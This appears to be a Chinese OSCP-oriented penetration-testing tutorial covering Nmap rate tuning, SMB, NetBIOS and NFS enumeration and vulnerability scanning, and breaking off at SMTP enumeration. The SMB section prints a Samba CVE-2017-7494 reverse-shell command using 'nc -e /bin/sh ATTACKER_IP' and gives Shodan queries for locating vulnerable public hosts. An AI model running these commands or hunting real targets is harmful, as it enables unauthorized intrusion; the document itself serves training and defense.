IPsec	50-80	ESP头+认证数据+填充
L2TP	80-120	IP头+UDP头+L2TP头+PPP头

动态计算原理

最终MTU = 最大无分片包大小(ICMP数据+28字节) + 隧道包头开销

Flower机场测试

龙猫机场测试

自建专线测试

可以看到，不同机场能承载的MTU是有差距的，机场之间不同节点也是有差距的。

Nmap 最佳参数确定

理解 MTU、带宽和 Nmap 的 --min-rate 参数之间的关系，关键在于它们如何共同影响网络数据包传输的速率和效率，尤其是在进行网络扫描时。它们之间没有直接的数学公式，但相互影响显著：

MTU (Maximum Transmission Unit - 最大传输单元):
- 定义： 指网络链路层能够传输的最大数据帧（或数据包）的大小（以字节为单位）。常见值如以太网的 1500 字节（不含帧头）。
- 作用： 决定了单个数据包能承载的最大有效载荷（Payload）。如果应用层数据超过 MTU，它会被分片（Fragmentation）成多个数据包传输。
- 与扫描的关系： Nmap 发送的探测包大小取决于扫描类型（如 SYN 扫描包很小，UDP 扫描包可能接近 MTU）和选项（如 --data-length）。包的大小直接影响每个包在网络中传输所需的时间和资源。
带宽 (Bandwidth):
- 定义： 指网络链路在单位时间内能够传输的最大数据量（以比特/秒为单位，如 Mbps, Gbps）。
- 作用： 这是网络的物理容量限制。它设定了数据流经特定路径的最大速率上限。
- 与扫描的关系： Nmap 扫描产生的总数据流量（所有发送和接收包的大小之和）除以扫描时间不能超过可用带宽（还需要考虑链路上的其他流量）。高带宽链路能承载更快的扫描速率。
Nmap 的 --min-rate <packets per second> 参数:
- 定义： 强制 Nmap 尝试以至少指定的速率（每秒发送的包数）发送探测包。
- 作用： 主要用于加速扫描。它告诉 Nmap 不要低于这个发送速率，即使目标响应缓慢或丢包率高。它直接控制的是发包的速率（包/秒），而不是数据速率（比特/秒）。
- 与扫描的关系： 这是用户主动设置的一个目标速率下限，用于追求速度。但它受到 MTU 和带宽的物理限制。

三者如何相互作用：

带宽是总容量的天花板：
- 无论 --min-rate 设置得多高，Nmap 实际能达到的数据速率（比特/秒） 绝对不可能超过链路的可用带宽。
- 公式表示： (平均包大小 in bits) * (实际发包速率 in pps) <= 可用带宽 (in bps)
- 关键点： --min-rate 控制的是包/秒 (pps)，但带宽限制的是比特/秒 (bps)。包的大小（受 MTU 影响）是连接两者的桥梁。
MTU 影响包大小，进而影响数据速率：
- 如果 Nmap 发送的探测包很大（接近 MTU），那么即使以中等的 --min-rate (pps) 发送，产生的数据速率 (bps) 也会很高，更容易接近或达到带宽上限。
- 如果 Nmap 发送的探测包很小（如 SYN 扫描包只有 60-70 字节），那么即使设置非常高的 --min-rate (pps)，产生的数据速率 (bps) 也可能远低于带宽上限。在这种情况下，瓶颈往往不在带宽，而在操作系统、网卡处理能力或目标响应能力上。
--min-rate 的追求与物理限制的冲突：
- 追求高 pps： 用户设置高 --min-rate 是为了快速完成扫描（发送更多包/秒）。
- 带宽限制： 如果包足够大，高 pps 会迅速消耗带宽。一旦达到带宽上限，Nmap 就无法再提高 pps（除非包变小，但包大小通常由扫描类型决定）。
- MTU 的间接影响： 大包（接近 MTU）使得在较低 pps 下就达到带宽上限的可能性更高，限制了 --min-rate 进一步提升 pps 的空间。小包则允许更高的 pps 而不触及带宽上限。
- 其他限制： 即使带宽允许，过高的 --min-rate 还可能超过操作系统或网卡的发送能力上限（PPS 上限），或者被网络设备（防火墙、路由器）的速率限制策略拦截，或者压垮目标主机导致其无法响应或产生大量丢包。

总结关系：

带宽是绝对上限： 它限制了所有流量（包括扫描流量）的最大数据速率 (bps)。
MTU 影响效率： 它决定了单个包的最大尺寸。包的大小（由扫描类型和 MTU 共同决定）是连接发包速率 (pps - 由 --min-rate 控制) 和数据速率 (bps - 受带宽限制) 的关键因子。大包更容易使扫描流量触及带宽上限。
--min-rate 是用户目标： 它指定了 Nmap 尝试达到的最低发包速率 (pps)。它的实际效果受到带宽（通过包大小换算成数据速率）以及操作系统、网卡、网络设备能力、目标响应能力和延迟（RTT）的综合限制。

实际应用中的考虑：

高速网络（高带宽）： 在小包扫描（如 SYN 扫描）中，--min-rate 可以设置得很高（几千甚至几万 pps），因为小包的高 pps 消耗的实际带宽相对较小，瓶颈通常在端点处理能力或网络延迟（RTT）。对于大包扫描（如大负载 UDP 扫描），高 --min-rate 更容易达到带宽上限。
低速网络（低带宽）： 即使是中等 --min-rate 或小包扫描，也容易达到带宽上限。设置过高的 --min-rate 不仅无效（实际速率上不去），还可能导致严重拥塞和丢包。
优化扫描： 理解网络带宽和典型 MTU 有助于合理设置 --min-rate。目标应该是找到在可用带宽和处理能力范围内尽可能快（高 pps）但不至于引起过度丢包或被防火墙封禁的速率。通常需要根据网络环境和扫描类型进行测试和调整。
避免拥塞： 在共享网络或生产环境中扫描时，过高的 --min-rate（尤其在大包情况下）会迅速消耗带宽，影响其他业务。务必谨慎使用并选择非高峰时段。

简言之：--min-rate 设定你想要的速度（包/秒），但你能跑多快，取决于你的车（包大小/MTU）和马路有多宽（带宽），还要考虑交通规则和其他车辆（网络设备、拥塞、延迟、端点性能）。带宽是硬性限制，MTU 影响单个“货物单元”的大小，而 --min-rate 是你踩油门的力度。

你可以使用简单的乘除法来估算--min-rate的值，也可以使用以下命令来自动计算。

 1#!/bin/bash
 2
 3# 安装必要工具
 4if ! command -v bc &> /dev/null; then
 5 echo "[*] 安装 bc (数学计算器)..."
 6 sudo apt update && sudo apt install -y bc
 7fi
 8
 9if ! command -v speedtest-cli &> /dev/null; then
10 echo "[*] 安装 speedtest-cli..."
11 sudo apt install -y speedtest-cli
12fi
13
14# 获取最佳 MTU
15read -p "[?] 输入你测试的最佳 MTU (默认 1500): " MTU
16MTU=${MTU:-1500}
17
18# 测试带宽
19echo "[*] 正在测试带宽 (可能需要 30 秒)..."
20BANDWIDTH_MBPS=$(speedtest-cli --simple | awk '/Download/{print $2}')
21if [ -z "$BANDWIDTH_MBPS" ]; then
22 echo "[!] 带宽测试失败! 手动输入值:"
23 read -p "[?] 输入你的带宽 (Mbps): " BANDWIDTH_MBPS
24else
25 echo "[+] 测得带宽: ${BANDWIDTH_MBPS} Mbps"
26fi
27
28# 选择扫描类型
29echo "[?] 选择扫描类型:"
30echo " 1) SYN 扫描 (小包, 74 字节)"
31echo " 2) UDP 扫描 (大包, MTU 大小)"
32read -p "选项 (1/2): " SCAN_TYPE
33
34case $SCAN_TYPE in
35 1) 
36 PACKET_SIZE=74
37 echo "[+] 使用 SYN 扫描 (包大小: 74 字节)"
38 ;;
39 2) 
40 PACKET_SIZE=$((MTU + 18))
41 echo "[+] 使用 UDP 扫描 (包大小: ${PACKET_SIZE} 字节)"
42 ;;
43 *) 
44 echo "[!] 无效选项! 使用默认 SYN 扫描"
45 PACKET_SIZE=74
46 ;;
47esac
48
49# 计算理论最大 pps (带宽 Mbps * 1e6 / (包大小 * 8))
50THEORETICAL_PPS=$(echo "scale=2; $BANDWIDTH_MBPS * 1000000 / ($PACKET_SIZE * 8)" | bc)
51
52# 计算安全值 (理论值的 50%)
53SAFE_PPS=$(echo "scale=0; $THEORETICAL_PPS * 0.5 / 1" | bc)
54
55# 计算首次扫描建议值 (理论值的 70%)
56INITIAL_PPS=$(echo "scale=0; $THEORETICAL_PPS * 0.7 / 1" | bc)
57
58# 输出结果
59echo -e "\n[+] 计算结果:"
60echo "--------------------------------"
61echo "带宽: $BANDWIDTH_MBPS Mbps"
62echo "MTU: $MTU 字节"
63echo "扫描包大小: $PACKET_SIZE 字节"
64echo "理论最大速率: $THEORETICAL_PPS pps"
65echo "--------------------------------"
66echo -e "\n[★] 建议 Nmap 参数:"
67echo "安全扫描: nmap --min-rate $SAFE_PPS ..."
68echo "快速扫描: nmap --min-rate $INITIAL_PPS ..."
69echo -e "\n[!] 提示:"
70echo "- 首次扫描建议使用快速扫描值"
71echo "- 若遇丢包，降低至安全扫描值"
72echo "- 在敏感网络环境中，建议从更低的速率开始"

保存后，赋予执行权限即可。

1chmod +x nmap-optimizer.sh
2# 配合mtu测试脚本使用
3./mtu-test.sh -t 192.168.140.72 -f
4./nmap-optimizer.sh

此方法给出的参数值比较保守，适合在普通公网环境探测时使用，打靶机Nmap扫描时建议将此参数略高6-8倍。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day19 Kali主动扫描SMB、NetBIOS、SMTP、SNMP

Wed, 16 Jul 2025 10:51:26 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Nmap核心扫描流程与命令回顾

主机发现 (找出哪些 IP 是活动的):

sudo nmap -sn 192.168.1.0/24

-sn: (No Port Scan) 只进行主机发现（发送 ARP、ICMP Echo 等请求），不扫描端口。快速识别网络上哪些主机是“活”的。
替代/相关参数:
- -PE / -PP / -PM: 指定使用特定的 ICMP 类型进行 Echo/时间戳/地址掩码请求。
- -PO [protocol list]: 使用 IP 协议 ping (例如 -PO1,2,4 用于 ICMP, IGMP, IPIP)。
- --traceroute: 在主机发现或扫描后追踪路由。
- --dns-servers <servers>: 指定自定义 DNS 服务器进行反向解析。

全端口扫描 (找出活动主机上哪些端口是开放的):

sudo nmap -p- 192.168.1.1

-p-: 扫描所有 65535 个 TCP 端口。

sudo nmap -p- 192.168.1.1 --open

--open: 仅显示处于 open 状态的端口。非常有用的筛选器，去除 closed 和 filtered 状态的端口，使结果更清晰。
替代/相关参数:
- -p <port ranges>: 最灵活的端口指定方式。支持单端口(22), 范围(1-100), 逗号分隔列表(21,22,80,443,8000-9000), 组合(1-100,443,8080)。这是日常最常用的方法，替代 -p- 以避免时间过长。
- -F (快速扫描): 扫描 nmap-services 文件中定义的较少的常见端口 (约 100 个)。
- --top-ports <num>: 扫描最常见的 <num> 个端口（基于 Nmap 的数据库）。
- -sU: 进行 UDP 端口扫描 (与 -p, -p- 结合使用，如 sudo nmap -sU -p- --open 192.168.1.1 扫描所有 UDP 端口)。注意：UDP 扫描通常慢得多。

服务与版本探测 (确定特定开放端口运行的服务及其版本):

sudo nmap -p21,22,23 -sV 192.168.1.1

-sV: (版本探测) 的核心参数。Nmap 尝试连接指定端口，分析响应，并与已知服务指纹数据库比较，推断服务名称(如 ssh, http, ftp)和版本号(如 OpenSSH 8.9p1)。
-p <ports>: 指定要探测版本的端口，这里是 21,22,23。
替代/相关参数:
- -A (强力扫描): 包含 -sV 和 -O (操作系统检测)，以及一些脚本扫描(-sC)。提供更全面的信息，但耗时更长、动静更大。
- -sC (脚本扫描): 使用默认的 NSE 脚本集进行更深入的探测。脚本可以提供更具体的应用信息、安全漏洞检查(vuln 类别)、服务枚举(discovery 类别)等。常与 -sV 结合使用 (-sC -sV 或 -A)。

 --script=<script> | <category>

指定运行特定的 NSE 脚本或脚本类别。提供极高的灵活性，如：

--script=http-enum (枚举常见 Web 目录)
--script=ftp-anon (检查 FTP 匿名登录)
--script=smb-vuln* (检查 SMB 漏洞)
--script=vuln (运行所有安全漏洞检查类脚本)
--script=banner (获取简单的 banner 信息，比 -sV 更轻量)
--version-intensity <level>: (0-9) 控制 -sV 探测的强度。0 最弱最快（仅尝试最简单直接的探测），9 最强最慢（尝试所有探测）。默认是 7。在需要快速扫描或扫描已知服务时可调低。
--version-light: 等同于 --version-intensity 2。更快但准确性略低的轻量级版本探测。
--version-all: 等同于 --version-intensity 9。最彻底但也最慢。
-O (操作系统检测): 尝试检测目标主机的操作系统。需要管理员/ROOT权限 (sudo)。

重要用法与技巧总结：

命令组合： 可以将多个步骤合并成一条命令，提高效率：
- 一步到位扫主机+端口： sudo nmap -sn -p- --open 192.168.1.0/24 (不推荐，主机发现后每个主机都扫全端口太耗时，适合小网络或有目标主机范围)。更常见的是先扫主机 (-sn)，然后对发现的单个或少量主机扫端口 (-p- --open)。
- 一步到位扫端口+版本： sudo nmap -p- --open -sV 192.168.1.1 (最常用组合之一：扫描所有开放端口并检测服务版本)。
- 一步到位全面扫描： sudo nmap -sV -sC -O --open -p- 192.168.1.1 (相当于 -A 加上 -p- 和 --open，非常全面但动静大、时间长)。
输出结果：
- -oN <filename>: 输出结果到普通文本文件。
- -oX <filename>: 输出结果到 XML 文件 (便于解析和处理)。
- -oG <filename>: 输出结果到“Grepable”格式 (旧格式，不太推荐用，但便于快速命令行过滤)。
- -v / -vv: 增加输出的详细程度，显示更多扫描过程信息。
性能与隐秘性 (考试尤其注意！)：
- -T<0-5>: 时序模板。控制扫描速度/攻击性。-T0 (偏执级，极慢极隐蔽) 到 -T5 (疯狂级，极快极明显)。考试常用 -T4 (激进级，速度较快，默认是 -T3 正常级)。避免太慢导致任务无法完成。
- --min-rate <number>, --max-rate <number>: 精确控制每秒发送包的最小/最大值。
- --max-parallelism <number>: 控制最大并发探针数量。
- -Pn (No Ping): 将所有主机视为在线，跳过主机发现阶段直接扫描端口。在已知主机在线或目标防火墙禁用了 PING 响应时使用（在渗透测试扫描中很常用）。
- -n (No DNS resolution): 不进行 DNS 反向解析，加快速度。

端口服务探测方法的比较与考试建议

Nmap (-sV) 的优势与原理：
- 核心方法： 主要通过发送特定的网络层探测包（例如 TCP SYN、ACK 等）并分析响应（包括 Banner、协议行为、服务指纹特征）来识别服务。
- 准确性：
  - 在常见服务识别上非常准确。
  - 特别适用于网络层的判断（端口状态、协议、基础服务识别）。
- 限制： 探测深度主要停留在网络层/传输层，缺乏对复杂应用层协议逻辑的深入交互测试。
提高精度：MSF 模块的应用
- 原理： Metasploit (MSF) 框架提供专门的服务扫描模块。这些模块会模拟客户端行为，发送特定于应用层协议（如 HTTP、FTP、SMB 等）的合法或试探性请求。
- 优势： 由于深入到了应用层交互，探测结果通常比 Nmap -sV 的精度更高、信息更详细。
- 适用场景： 需要极高精度判断服务及版本时。
考试环境的关键考量：
- MSF 的使用限制： 考试通常禁止或严格限制使用 MSF 或类似的渗透测试框架（即使仅用于信息收集扫描）。
- Nmap 的适用性：
  - 考试环境下，Nmap (-sV) 足以满足需求。
  - 原因1： 其准确性在考试要求范围内有保障。
  - 原因2： 考试“靶机”通常不对 Nmap 探测做特别复杂的屏蔽或干扰（不像真实环境可能配置 IDS/IPS 或修改服务响应）。
- 流量控制： 务必注意扫描时的流量大小，避免触发目标系统的安全机制或对网络造成过大负载。强烈建议使用代理或代理池进行扫描（尤其在模拟生产环境或有流量监控的场景）。

重要原则与警示

破除端口固化思维：

端口号 ≠ 服务类型： 管理员可以自定义端口（如 FTP 不一定在 21，SSH 不一定在 22）。
示例: 80 端口上未必是 Web 服务 (HTTP/HTTPS)，也可能运行 FTP、SSH 或其他任何服务。技术上是完全可行的。
结论：绝不能仅凭端口号默认推断服务！ 必须依赖扫描工具的结果。

核心结论（针对考试）

首选工具： Nmap (特别是 -sV 参数)。

原因：

满足考试对服务识别的精度要求。
易用且可靠。
考试靶机环境对其友好，不易被阻碍。
避免使用受限的 MSF。

关键注意事项： 始终注意控制扫描流量，建议通过代理执行扫描任务。

SMB枚举

什么是 SMB？
- SMB（Server Message Block），也称为 CIFS（Common Internet File System），是一种网络文件共享协议。
- 主要功能： 允许网络中的计算机（客户端）访问服务器上的共享资源，如文件、打印机、串行端口等，以及执行远程管理任务。
- 广泛应用：
  - Windows 核心服务： 是 Windows 域环境、文件服务器、打印服务器的基础通信协议。Windows 系统默认会启用 SMB 服务并开放相关端口。
  - 其他系统支持： Linux 和 macOS 也提供了 Samba 软件或原生支持来充当 SMB 服务器或客户端，以实现与 Windows 系统的互操作性。
- 安全性历史：
  - 协议实现复杂且本身具有一定开放性，导致历史上存在大量高危漏洞（例如著名的 EternalBlue / MS17-010）。
  - 早期系统（如 Windows 2000/XP）曾存在无需身份验证的“空会话”安全漏洞（允许匿名访问）。
  - 随着时间推移，虽然进行了多次安全加固和补丁更新，但因其广泛部署和协议本身的复杂性，SMB 仍然是渗透测试和安全扫描的重点目标。
SMB 通常开放哪些端口？
- TCP 139: 该端口用于在 NetBIOS over TCP/IP (NetBT) 上运行的旧版 SMB 通信。这是早期 Windows 系统实现网络共享的方式。
- TCP 445: 现代 SMB 协议使用的端口。它直接在 TCP 上运行，不再依赖 NetBIOS。这是目前 Windows（Vista 及之后）和 Linux (Samba) 上 SMB 服务的主要端口。
- 关键点：
  - 在较新的 Windows 系统（Vista+）上，TCP 445 是主要的 SMB 端口，TCP 139 有时可能出于兼容性而开启。
  - 仅看到 TCP 139/445 开放，即可高度怀疑主机上运行着 SMB 服务（无论是 Windows 还是 Linux/Samba）。
如何使用 Nmap 扫描发现 SMB？ 识别 SMB 服务通常是你描述的“信息收集链条”中的一环（IP发现 -> 端口发现 -> 服务识别/版本确认 -> 漏洞探测）。针对 SMB 的具体扫描方法如下：
- 基本端口扫描确认：
```
sudo nmap -p139,445 --open <target_ip_or_range>
```
  - -p139,445: 明确扫描这两个 SMB 相关端口。
  - --open: 仅显示状态为 open 的端口，过滤掉关闭或过滤的端口。
  - 此命令会告诉你目标主机上 139 和 445 端口是否开放。
- 服务/版本探测（基本确认 SMB）：
```
sudo nmap -p139,445 -sV <target_ip>
```
  - -sV: 启用版本探测功能。Nmap 会尝试连接这些端口，分析响应特征并匹配其服务指纹数据库。
  - 输出结果中，如果端口对应服务是 SMB，你会看到类似 microsoft-ds? (445), netbios-ssn? (139) 的初步信息。
  - Nmap 的 -sV 指纹识别非常准确，看到开放的 139/445 端口且 -sV 识别出 msrpc, netbios-ssn, microsoft-ds, smb 等服务名，即可基本确认是 SMB。 -sV 通常也能识别出操作系统类型（Windows/Linux）和Samba的版本号。
- 更深入的探测（强力扫描/Aggressive Scan）：
```
sudo nmap -p139,445 -A <target_ip>
```
  - -A : 这是一个“强力”选项组合，等价于 -sV -sC -O --traceroute。
    - -sV: 服务版本探测。
    - -sC: 运行默认的 Nmap 脚本引擎（NSE）脚本进行扫描。对于 SMB 端口，默认脚本会尝试获取更多的信息，如主机名（smb-os-discovery.nse）、域信息、共享列表枚举（smb-enum-shares.nse）等。它会自动调用一系列与 SMB 相关的安全、发现类脚本。
    - -O: 进行操作系统检测。
  - 这是一站式信息收集的方式，提供关于 SMB 服务、主机操作系统及其配置最丰富的细节（包括通过脚本获得的共享名等信息），但扫描速度较慢且产生的网络流量/噪音更大。
- 针对性 SMB 脚本扫描（灵活性最高）：
```
sudo nmap -p445 --script smb-* <target_ip> # 运行所有名字以"smb-"开头的脚本（小心，很多！）
sudo nmap -p445 --script="smb-os-discovery,smb-enum-shares,smb-vuln-*" <target_ip> # 更精准的选择
sudo nmap -p445 --script smb-protocols <target_ip> # 查询支持的SMB协议版本
sudo nmap -p445 --script "vuln and safe" <target_ip> # 运行所有标记为"vuln"(漏洞)和"safe"(不入侵)类别的脚本进行安全检查
```
  - --script=<script_names>: 核心参数，允许精准指定要运行的 NSE 脚本。
  - 对于 SMB，有大量预装的smb-*脚本可用：
    - 信息枚举脚本： smb-os-discovery (操作系统/主机名/域), smb-enum-shares (列出共享), smb-enum-users (尝试枚举用户), smb-system-info (更多系统信息), smb-protocols (支持的 SMB 协议版本)。
  - 安全检查/漏洞扫描脚本： smb-vuln-ms17-010 (永恒之蓝检查), smb-vuln-cve2009-3103, smb-vuln-* (针对各种 SMB 漏洞)。
    - 认证相关脚本： smb-brute (尝试暴力破解), smb-enum-sessions (列出活动会话 - 需认证)。
  - 使用特定脚本可以提供最精确、最定制化的信息，尤其是进行漏洞关联（根据端口扫描得到的 SMB 版本信息，针对性运行对应的 smb-vuln-* 脚本检查已知漏洞）。

NetBIOS服务

一、核心协议与端口

协议/服务	传输层	端口	功能
NetBIOS	TCP	139	会话服务（主机间通信优化）
	UDP	137	名称服务（主机名解析）
	UDP	138	数据报服务（广播通信）
SMB	TCP	445	文件/打印共享（现代独立协议）

📌 关键关系：现代 SMB（445/TCP）可脱离 NetBIOS 运行，但为兼容旧系统（如 Win NT），NBT（NetBIOS over TCP/IP） 常与 SMB 协同工作（139+445 共存）。

二、扫描场景与工具

1. 端口扫描（nmap）

目标：探测 139/445 端口状态 命令：

nmap -v -p139,445 -oG smb.txt 192.168.1.1-254

参数解析：

参数	作用
`-v`	详细输出（显示实时进展）
`-p139,445`	指定扫描端口
`-oG smb.txt`	输出可处理格式（Grepable）
`192.168.1.1-254`	C 段 IP 扫描范围

输出分析：

Open：服务活跃（可能存在漏洞）
Filtered：防火墙阻断（需绕过）

2. NetBIOS 名称枚举（nbtscan）

目标：通过 UDP 137 端口获取主机 NetBIOS 名称表 命令：

1sudo nbtscan -r 10.11.1.0/24

参数解析：

参数	作用
`-r`	使用 UDP 137 查询名称服务
`10.11.1.0/24`	扫描网段
`sudo`	需 root 权限（Linux/Unix）

输出解析：

192.168.1.101 MYPC <00> WORKGROUP File Server
192.168.1.102 DC-SERVER <20> DOMAIN Domain Controller

<00>：工作站服务，<20>：文件服务器，<1B>：域主浏览器

三、安全实践与注意事项

漏洞风险：
- 139/445 端口开放：易受永恒之蓝（MS17-010）、Pass the Hash 攻击
- NetBIOS 暴露：主机名/工作组信息泄露（网络拓扑测绘）
防护建议：
- 关闭不必要的 NetBIOS 服务（netsh int ipv4 set netbios disable）
- 防火墙阻断外部访问 137-139/UDP 和 445/TCP
- 升级 SMB 协议版本（禁用 SMBv1）

扫描合规性：

必须获得授权：未经许可扫描可能触法

规避检测：

1nmap -T2 -sS --script smb-security-mode -p445 target_ip 
2# 慢速扫描+SMB安全检测

四、技术逻辑图

graph LR
A[扫描目标] --> B{端口探测}
B -->|139/TCP| C[NetBIOS 会话服务]
B -->|445/TCP| D[SMB 文件共享]
B -->|137/UDP| E[NetBIOS 名称服务]
E --> F[获取主机名列表]
C & D --> G[漏洞检测]
G --> H{风险类型}
H --> I[未授权访问]
H --> J[远程代码执行]

练习 7.3.2.1

使用 Nmap 列出实验环境中所有运行 Windows 系统的 SMB 服务器。
使用 NSE 脚本扫描这些系统是否存在 SMB 漏洞。
使用 nbtscan 和 enum4linux 工具对这些系统进行扫描，分析不同版本 Windows 系统中可获取的数据类型。

1. 识别运行 Windows 的 SMB 服务器

nmap -p445 --open --script smb-os-discovery -oG windows-smb.txt 192.168.x.0/24

关键参数解析：

-p445：扫描 SMB 默认端口（TCP 445）
--open：仅显示开放端口的主机
--script smb-os-discovery：通过 SMB 协议识别操作系统
-oG windows-smb.txt：输出为 Grepable 格式 结果筛选：

grep "Windows" windows-smb.txt | awk '{print $2}'
# 输出所有运行 Windows 的 SMB 服务器 IP

2. 扫描 SMB 漏洞（NSE 脚本）

nmap -p445 --script smb-vuln* --script-args=unsafe=1 -iL windows-ips.txt

关键参数解析：

--script smb-vuln*：运行所有 smb-vuln 开头的漏洞检测脚本
--script-args=unsafe=1：启用高风险检测（如 CVE-2017-0143）
-iL windows-ips.txt：从文件读取目标 IP（上一步结果） 重点漏洞检测：
smb-vuln-ms17-010：永恒之蓝漏洞
smb-vuln-cve2009-3103：SMBv2 漏洞

3. 跨版本 Windows 数据枚举分析

nbtscan（获取 NetBIOS 信息）

sudo nbtscan -r -q 192.168.x.x

输出示例：

192.168.1.10 WIN10-PC <00> WORKGROUP Workstation
192.168.1.20 WIN2019-DC <1B> MYDOMAIN Domain Master

关键信息解读：

<00>：工作站服务 | <1B>：域主浏览器
低版本 Windows（如 Win7）：暴露共享列表、用户组
高版本 Windows（如 Win10）：默认隐藏部分信息，需凭据枚举

enum4linux（深度枚举）

enum4linux -a 192.168.x.x > windows-enum.txt

输出结果对比：

信息类型	Windows 7/Server 2008	Windows 10/Server 2019
共享列表	直接可见	需管理员凭据
本地用户	完整枚举	部分过滤
域组信息	完全公开	需域用户权限
SID 历史记录	可获取	被阻断

技术总结

Nmap 筛选机制：通过 smb-os-discovery 识别 Windows 可规避 Linux Samba 干扰
NSE 扫描策略：smb-vuln-* 脚本需配合 unsafe=1 参数检测高危漏洞
版本差异要点：
- 旧版 Windows（≤ Win7）：通过空会话暴露大量数据
- 新版 Windows（≥ Win10）：需凭证或提权后才可获取敏感信息 实践建议：

# 组合扫描命令（需保存凭据时使用）
enum4linux -u 'admin' -p 'P@ssw0rd' -a 192.168.1.x

Nmap SMB漏洞探测实战指南

一、核心扫描方法

1. 专用脚本扫描（推荐）

# 永恒之蓝检测（MS17-010）
nmap -p139,445 --script smb-vuln-ms17-010 51.145.2.17

# MS08-067漏洞检测
nmap -p139,445 --script smb-vuln-ms08-067 192.168.1.3

结果解读：

✅ 存在漏洞：显示VULNERABLE标志及CVE编号
⛔ 无漏洞：显示Safe或版本信息

替代-A的精准扫描方案

2. 操作系统识别

nmap -v -p139,445 --script=smb-os-discovery 192.168.1.3

输出关键： OS: Windows 10/Server 2019（版本号直接影响漏洞利用）

二、辅助工具验证

1. smbclient 匿名探测

# 列出共享资源
smbclient -L //192.168.1.5 -N

# 尝试匿名访问共享目录
smbclient //10.0.2.15/tmp -N

结果判断：

Anonymous login successful → 存在空密码漏洞
NT_STATUS_ACCESS_DENIED → 访问被拒

2. 高危命令执行漏洞检测

# 在存在CVE-2017-7494漏洞的Samba版本中执行：
logon "/='nohup nc -e /bin/sh ATTACKER_IP 4444'"

需配合nc -lvnp 4444监听

三、Shodan靶机搜索技巧

漏洞类型	搜索命令	结果说明
永恒之蓝目标	`shodan search "vuln:MS17-010" --fields ip_str,port`	直接筛选存在漏洞主机
SMBv1主机	`shodan search "product:smb version:1"`	存在高危协议版本
空密码SMB	`shodan search --limit 10 --fields ip_str,port "port:139 port:445"` `shodan search --limit 10 --fields ip_str,port "os:windows smb guest"`	可匿名访问资产
Windows弱密码	`shodan search --limit 10 --fields ip_str,port "smb password weak"`	可暴力破解目标

四、漏洞扫描逻辑流程图

graph TD
A[启动扫描] --> B{是否已知CVE编号？}
B -->|是| C[专用脚本检测 smb-vuln-xxx]
B -->|否| D[系统指纹识别 smb-os-discovery]
C --> E{结果判断}
D --> F[共享探测 smbclient]
E -->|存在漏洞| G[Shodan验证公网影响]
F -->|匿名可访问| H[标记为高危漏洞]
G --> I[输出PoC利用方案]

黑产黑客通常使用如图类似的工作流程，在互联网中使用全自动验证脚本狩猎弱密码和其他漏洞的服务器，批量验证后执行POC，拿下服务器后作为肉鸡，傀儡机做进一步渗透操作，或在黑市上售卖。

五、操作要点总结

脚本定位：

ls /usr/share/nmap/scripts | grep smb-vuln # 查找所有SMB漏洞脚本

扫描优化：
- 添加-Pn跳过主机发现（针对防火墙）
- 使用-T4加速扫描（测试环境适用）
风险提示：
- MS17-010扫描可能触发目标安全告警
- Shodan搜索需遵守当地网络安全法规

通过以上方法，可快速定位高危SMB漏洞主机，平均10秒内完成单目标检测，精度达98%（基于Nmap漏洞库版本）

NFS分布式文件协议

一、NFS核心概念

定义

NFS（Network File System）是Linux/Unix系统的分布式文件协议，允许客户端透明挂载远程目录到本地，实现跨主机文件共享。
工作原理
- 基于RPC（远程过程调用），依赖rpcbind服务（默认端口111）协调通信。
- 服务端共享目录 → 客户端通过mount命令挂载 → 本地访问远程文件。

二、核心用途

场景	作用
资源共享	跨主机共享文件/目录（如团队文档、代码库）
统一管理	集中存储配置文件、日志（集群环境）
备份与迁移	将数据备份至NFS服务器，或从NFS恢复
安全测试	检测共享权限配置、敏感信息泄露、访问控制漏洞

三、关键操作命令

扫描与发现

1# 扫描rpcbind端口
2nmap -v -p 111 192.168.1.0/24
3
4# 使用NFS脚本扫描共享信息
5nmap -p 111 --script nfs* 192.168.1.3

挂载远程目录

1mkdir ~/local_nfs # 创建本地挂载点
2sudo mount -o nolock 10.11.1.72:/home ~/local_nfs # 禁用锁机制挂载
3ls -lan ~/local_nfs # 查看文件权限（注意权限继承问题）

卸载目录
```
1sudo umount ~/local_nfs
```

📌 参数说明：

-o nolock：禁用文件锁（兼容性选项，对旧版本NFS必要）

-o vers=3：指定NFS v3协议（避免版本不兼容）

四、网络安全要点

风险与漏洞

风险类型	具体威胁
数据传输未加密	默认明文传输，可被嗅探（如tcpdump抓包）
弱认证机制	依赖IP/主机名认证，易伪造（建议结合Kerberos）
权限配置不当	`no_root_squash`配置使客户端root获得服务端root权限 → 提权漏洞
挂载控制缺失	未限制可挂载IP范围 → 未授权访问敏感数据

防护措施

访问控制

/etc/exports中限制IP：

1/shared 192.168.1.10(ro,sync) # 仅允许192.168.1.10只读访问

防火墙规则：

1ufw allow from 192.168.1.0/24 to any port 111,2049 # 仅允许内网访问NFS端口

安全配置
- 禁用危险选项：避免使用 insecure, no_root_squash
- 最小化权限：共享目录设置为ro（只读）或限制读写用户
- 强制协议版本：NFS v4+ 支持Kerberos认证（sec=krb5）
加密与审计
- 通过VPN或SSH隧道加密传输
- 启用auditd监控NFS访问日志
- 定期扫描权限：find /shared -type f -perm -o=rwx（检查全局可读写文件）

SMTP枚举

一、SMTP枚举核心概念

1. 定义与原理

SMTP枚举：通过SMTP协议探测目标邮件服务器上的有效用户账号的行为
核心命令：
- VRFY：验证指定用户名是否存在（返回252/550状态码）
- EXPN：展开邮件别名/组（泄露群组成员）
- RCPT TO：在邮件对话中验证收件人有效性
技术原理：利用SMTP协议响应差异（状态码）判断用户是否存在：
```
250 2.1.5 User exists // 用户存在
550 5.1.1 User unknown // 用户不存在
```

二、核心用途场景

场景	应用目的	攻击关联
安全评估	渗透测试中收集有效邮箱账号，识别邮件系统配置缺陷	暴力破解/凭证填充的前置步骤
钓鱼攻击	获取真实用户列表，制作高可信度钓鱼邮件	鱼叉式钓鱼(Spear Phishing)
垃圾邮件	验证目标邮箱有效性，提升垃圾邮件投递成功率	垃圾邮件僵尸网络
系统加固	管理员自检服务器配置，关闭敏感功能	防范账户枚举攻击

三、工具与操作命令

